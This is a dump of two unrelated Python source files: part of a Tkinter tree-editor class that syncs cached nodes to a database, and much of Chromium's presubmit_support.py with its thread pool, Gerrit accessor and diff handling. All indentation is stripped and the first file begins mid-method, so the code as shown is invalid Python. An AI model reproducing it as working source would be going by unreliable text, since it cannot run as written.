cache_selected_items = self.cachedTreeFrame.cachedTree.selection()
if len(cache_selected_items) != 0:
self.popup('')
if len(self.entry_window.value) == 0:
return
item = self.cachedTreeFrame.cachedTree.item(cache_selected_items[0])
node_name = self.entry_window.value
node_id = str(uuid.uuid4())
root_node_data = self.find_node_data_by_uuid(item['values'][0], self.cached_tree_data)
self.events_manager.append_event(AddEvent(node_id, root_node_data['node']['id'], node_name))
if not root_node_data['node']['deleted']:
node_data = {'name': node_name, 'root': root_node_data['node']['id'], 'id': None, 'deleted': False}
self.append_to_cache(node_data)
@run_in_thread
def get_node_from_db(self):
db_selected_items = self.dbTreeFrame.dbTree.selection()
if len(db_selected_items) != 0:
item = self.dbTreeFrame.dbTree.item(db_selected_items[0])
db_node_data = self.find_node_data_by_uuid(item['values'][0], self.db_tree_data)['node']
if not db_node_data['deleted']:
nid = db_node_data['id']
if not self.node_exists(nid, self.cached_tree_data):
res_node = get_node(nid)
self.append_to_cache(res_node)
def delete_node(self):
cache_selected_items = self.cachedTreeFrame.cachedTree.selection()
if len(cache_selected_items) == 0:
return
item = self.cachedTreeFrame.cachedTree.item(cache_selected_items[0])
node_data = self.find_node_data_by_uuid(item['values'][0], self.cached_tree_data)
self.events_manager.append_event(DeleteEvent(node_data['node']['id']))
if not node_data['node']['deleted']:
self.delete_subtree(node_data)
self.redraw_cached()
def reset(self):
self.load_db_data()
self.cached_tree_data = list()
self.redraw_cached()
def edit(self):
cache_selected_items = self.cachedTreeFrame.cachedTree.selection()
if len(cache_selected_items) != 0:
item = self.cachedTreeFrame.cachedTree.item(cache_selected_items[0])
node_data = self.find_node_data_by_uuid(item['values'][0], self.cached_tree_data)
if node_data['node']['deleted'] is True:
return
self.popup(item['text'])
if len(self.entry_window.value) == 0:
return
node_name = self.entry_window.value
node_data['node']['name'] = node_name
self.events_manager.append_event(EditEvent(node_data['node']['id'], node_name))
self.redraw_cached()
def _refill_new(self, children):
for child in children:
if 'new' in child:
child['node']['id'] = None
child['node']['root'] = None
self._refill_new(child['children'])
@run_in_thread
def apply(self):
self._refill_new(self.cached_tree_data)
self.cached_tree_data = update(self.cached_tree_data)
self.db_tree_data = get_all_tree()
self.redraw_db()
self.redraw_cached()
@run_in_thread
def apply_events(self):
events = self.events_manager.serialize_events()
update_events(events)
self.db_tree_data = get_all_tree()
self.redraw_db()
self.redraw_cached()
self.events_manager.clear()
|
presubmit_support.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
from __future__ import print_function
__version__ = '2.0.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import argparse
import ast # Exposed through the API.
import contextlib
import cpplint
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import multiprocessing
import os # Somewhat exposed through the API.
import random
import re # Exposed through the API.
import signal
import six
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback
import unittest # Exposed through the API.
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners as owners_db
import owners_client
import owners_finder
import presubmit_canned_checks
import rdb_wrapper
import scm
import subprocess2 as subprocess # Exposed through the API.
if sys.version_info.major == 2:
# TODO(1009814): Expose urllib2 only through urllib_request and urllib_error
import urllib2 # Exposed through the API.
import urlparse
import urllib2 as urllib_request
import urllib2 as urllib_error
else:
import urllib.parse as urlparse
import urllib.request as urllib_request
import urllib.error as urllib_error
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
def time_time():
# Use this so that it can be mocked in tests without interfering with python
# system machinery.
return time.time()
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message, python3=False):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs.copy()
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
self.python3 = python3
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate().
class SigintHandler(object):
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
self.__previous_signal = signal.signal(signal.SIGINT, self.interrupt)
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self, signal_num, frame):
with self.__lock:
self.__on_sigint()
self.__previous_signal(signal_num, frame)
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
return stdout, stderr
sigint_handler = SigintHandler()
class Timer(object):
def __init__(self, timeout, fn):
self.completed = False
self._fn = fn
self._timer = threading.Timer(timeout, self._onTimer) if timeout else None
def __enter__(self):
if self._timer:
self._timer.start()
return self
def __exit__(self, _type, _value, _traceback):
if self._timer:
self._timer.cancel()
def _onTimer(self):
self._fn()
self.completed = True
class ThreadPool(object):
def __init__(self, pool_size=None, timeout=None):
self.timeout = timeout
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def _GetCommand(self, test):
vpython = 'vpython'
if test.python3:
vpython += '3'
if sys.platform == 'win32':
vpython += '.bat'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
# On Windows, scripts on the current directory take precedence over PATH, so
# that when testing depot_tools on Windows, calling `vpython.bat` will
# execute the copy of vpython of the depot_tools under test instead of the
# one in the bot.
# As a workaround, we run the tests from the parent directory instead.
if (cmd[0] == vpython and
'cwd' in test.kwargs and
os.path.basename(test.kwargs['cwd']) == 'depot_tools'):
test.kwargs['cwd'] = os.path.dirname(test.kwargs['cwd'])
cmd[1] = os.path.join('depot_tools', cmd[1])
return cmd
def _RunWithTimeout(self, cmd, stdin, kwargs):
p = subprocess.Popen(cmd, **kwargs)
with Timer(self.timeout, p.terminate) as timer:
stdout, _ = sigint_handler.wait(p, stdin)
if timer.completed:
stdout = 'Process timed out after %ss\n%s' % (self.timeout, stdout)
return p.returncode, stdout.decode('utf-8', 'ignore');
def CallCommand(self, test):
"""Runs an external program.
This function converts invocation of .py files and invocations of 'python'
to vpython invocations.
"""
cmd = self._GetCommand(test)
try:
start = time_time()
returncode, stdout = self._RunWithTimeout(cmd, test.stdin, test.kwargs)
duration = time_time() - start
except Exception:
duration = time_time() - start
return test.message(
'%s\n%s exec failure (%4.2fs)\n%s' % (
test.name, ' '.join(cmd), duration, traceback.format_exc()))
if returncode != 0:
return test.message(
'%s\n%s (%4.2fs) failed\n%s' % (
test.name, ' '.join(cmd), duration, stdout))
if test.info:
return test.info('%s\n%s (%4.2fs)' % (test.name, ' '.join(cmd), duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
def prompt_should_continue(prompt_string):
sys.stdout.write(prompt_string)
sys.stdout.flush()
response = sys.stdin.readline().strip().lower()
return response in ('y', 'yes')
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self):
sys.stdout.write(self._message)
sys.stdout.write('\n')
for index, item in enumerate(self._items):
sys.stdout.write(' ')
# Write separately in case it's unicode.
sys.stdout.write(str(item))
if index < len(self._items) - 1:
sys.stdout.write(' \\')
sys.stdout.write('\n')
if self._long_text:
sys.stdout.write('\n***************\n')
# Write separately in case it's unicode.
sys.stdout.write(str(self._long_text))
sys.stdout.write('\n***************\n')
def json_format(self):
return {
'message': self._message,
'items': [str(item) for item in self._items],
'long_text': self._long_text,
'fatal': self.fatal
}
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, url=None, project=None, branch=None):
self.host = urlparse.urlparse(url).netloc if url else None
self.project = project
self.branch = branch
self.cache = {}
self.code_owners_enabled = None
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
However, API isn't very clear what's inside, so see tests for example.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
# info is a reference to cache. We'll modify it here adding description to
# it to the right patchset, if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].items():
if str(rev_info['_number']) == str(patchset):
break
else:
raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def _GetApproversForLabel(self, issue, label):
change_info = self.GetChangeInfo(issue)
label_info = change_info.get('labels', {}).get(label, {})
values = label_info.get('values', {}).keys()
if not values:
return []
max_value = max(int(v) for v in values)
return [v for v in label_info.get('all', [])
if v.get('value', 0) == max_value]
def IsBotCommitApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Bot-Commit'))
def IsOwnersOverrideApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Owners-Override'))
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
reviewers = self._GetApproversForLabel(issue, 'Code-Review')
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
def UpdateDescription(self, description, issue):
gerrit_util.SetCommitMessage(self.host, issue, description, notify='NONE')
def IsCodeOwnersEnabledOnRepo(self):
if self.code_owners_enabled is None:
self.code_owners_enabled = gerrit_util.IsCodeOwnersEnabledOnRepo(
self.host, self.project)
return self.code_owners_enabled
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r'(^|.*?[\\\/])[^.]+$' to the allow list.
# Note that ALL CAPS files are skipped in DEFAULT_FILES_TO_SKIP below.
DEFAULT_FILES_TO_CHECK = (
# C++ and friends
r'.+\.c$', r'.+\.cc$', r'.+\.cpp$', r'.+\.h$', r'.+\.m$', r'.+\.mm$',
r'.+\.inl$', r'.+\.asm$', r'.+\.hxx$', r'.+\.hpp$', r'.+\.s$', r'.+\.S$',
# Scripts
r'.+\.js$', r'.+\.py$', r'.+\.sh$', r'.+\.rb$', r'.+\.pl$', r'.+\.pm$',
# Other
r'.+\.java$', r'.+\.mk$', r'.+\.am$', r'.+\.css$', r'.+\.mojom$',
r'.+\.fidl$'
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_FILES_TO_SKIP = (
r'testing_support[\\\/]google_appengine[\\\/].*',
r'.*\bexperimental[\\\/].*',
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r'.*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*',
# Output directories (just in case)
r'.*\bDebug[\\\/].*',
r'.*\bRelease[\\\/].*',
r'.*\bxcodebuild[\\\/].*',
r'.*\bout[\\\/].*',
# All caps files like README and LICENCE.
r'.*\b[A-Z0-9_]{2,}$',
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r'(|.*[\\\/])\.git[\\\/].*',
r'(|.*[\\\/])\.svn[\\\/].*',
# There is no point in processing a patch file.
r'.+\.diff$',
r'.+\.patch$',
)
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_WHITE_LIST(self):
return self.DEFAULT_FILES_TO_CHECK
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_WHITE_LIST.setter
def DEFAULT_WHITE_LIST(self, value):
self.DEFAULT_FILES_TO_CHECK = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_ALLOW_LIST(self):
return self.DEFAULT_FILES_TO_CHECK
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_ALLOW_LIST.setter
def DEFAULT_ALLOW_LIST(self, value):
self.DEFAULT_FILES_TO_CHECK = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_BLACK_LIST(self):
return self.DEFAULT_FILES_TO_SKIP
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_BLACK_LIST.setter
def DEFAULT_BLACK_LIST(self, value):
self.DEFAULT_FILES_TO_SKIP = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_BLOCK_LIST(self):
return self.DEFAULT_FILES_TO_SKIP
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_BLOCK_LIST.setter
def DEFAULT_BLOCK_LIST(self, value):
self.DEFAULT_FILES_TO_SKIP = value
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cpplint = cpplint
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
# TODO(yyanagisawa): stop exposing this when python3 become default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.re = re
self.subprocess = subprocess
self.sys = sys
self.tempfile = tempfile
self.time = time
self.unittest = unittest
if sys.version_info.major == 2:
self.urllib2 = urllib2
self.urllib_request = urllib_request
self.urllib_error = urllib_error
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'vpython' in order to allow scripts in other
# repos (e.g. src.git) to automatically pick up that repo's .vpython file,
# instead of inheriting the one in depot_tools.
self.python_executable = 'vpython'
# Offer a python 3 executable for use during the migration off of python 2.
self.python3_executable = 'vpython3'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
self.owners_client = None
if self.gerrit:
self.owners_client = owners_client.GetCodeOwnersClient(
root=change.RepositoryRoot(),
upstream=change.UpstreamBranch(),
host=self.gerrit.host,
project=self.gerrit.project,
branch=self.gerrit.branch)
self.owners_db = owners_db.Database(
change.RepositoryRoot(), fopen=open, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with 'base/containers/hash_tables.h' instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def SetTimeout(self, timeout):
self.thread_pool.timeout = timeout
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
presubmit script. For example, It can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof. Note that files are listed using the OS
path separator, so backslashes are used as separators on Windows.
"""
dir_with_slash = normpath('%s/' % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return list(filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter)))
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug('LocalPaths: %s', paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn('AffectedTestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self,
affected_file,
files_to_check=None,
files_to_skip=None,
allow_list=None,
block_list=None):
"""Filters out files that aren't considered 'source file'.
If files_to_check or files_to_skip is None, InputApi.DEFAULT_FILES_TO_CHECK
and InputApi.DEFAULT_FILES_TO_SKIP is used respectively.
The lists will be compiled as regular expression and
AffectedFile.LocalPath() needs to pass both list.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
if files_to_check is None:
files_to_check = self.DEFAULT_FILES_TO_CHECK
if files_to_skip is None:
files_to_skip = self.DEFAULT_FILES_TO_SKIP
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, files_to_check) and
not Find(affected_file, files_to_skip))
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return list(filter(source_file, self.AffectedTestableFiles()))
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in 'new' version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
Note: The carriage return (LF or CR) is stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
# When self.parallel is True (i.e. --parallel is passed as an option)
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
# Otherwise, it will run them and return the results.
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
# Compute a single diff for all files and parse the output; should
# with git this is much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
# This regex matches the path twice, separated by a space. Note that
# filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in diffs.items())
if path not in self._diffs_by_file:
raise PresubmitFailure(
'Unified diff did not contain entry for file %s' % path)
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
Deleted files are not text file."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the 'left hand side'.
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the 'right hand
side'.
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
except UnicodeDecodeError as e:
# log the filename since we're probably trying to read a binary
# file, and shouldn't be.
print('Error reading %s: %s' % (self.AbsoluteLocalPath(), e))
raise
return self._cached_new_contents[:]
def ChangedContents(self, keeplinebreaks=False):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
# Don't return cached results when line breaks are requested.
if not keeplinebreaks and self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
result = []
line_num = 0
# The keeplinebreaks parameter to splitlines must be True or else the
# CheckForWindowsLineEndings presubmit will be a NOP.
for line in self.GenerateScmDiff().splitlines(keeplinebreaks):
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
result.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
# Don't cache results with line breaks.
if keeplinebreaks:
return result;
self._cached_changed_contents = result
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
